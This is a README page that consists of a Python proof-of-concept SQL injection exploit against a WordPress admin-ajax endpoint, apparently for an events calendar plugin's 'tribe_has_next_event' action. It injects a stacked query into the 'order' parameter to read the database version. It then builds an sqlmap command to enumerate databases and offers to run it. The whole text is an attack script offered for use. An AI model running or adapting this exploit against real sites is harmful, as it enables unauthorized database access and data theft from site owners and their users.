README.md
Rendering markdown...
import requests
import os
url = "http://vulnerable-site.com/wp-admin/admin-ajax.php"
payload = {
"action": "tribe_has_next_event",
"order": "ASC; SELECT @@version--"
}
try:
response = requests.get(url, params=payload)
if response.status_code == 200 and "version" in response.text:
print("[+] Vulnerability Exploited Successfully!")
print("Extracted Database Version: ", response.text)
sqlmap_command = f"sqlmap -u \"{url}\" --data \"action=tribe_has_next_event&order=ASC\" --dbs --batch"
print("\n[+] Generated sqlmap command:")
print(sqlmap_command)
run_sqlmap = input("\nDo you want to run the sqlmap command? (yes/no): ").lower()
if run_sqlmap == "yes":
os.system(sqlmap_command)
else:
print("You can copy and paste the command to run manually.")
else:
print("[-] Exploit failed or target not vulnerable.")
except Exception as e:
print("[-] An error occurred while attempting the exploit.")
print(f"Error: {e}")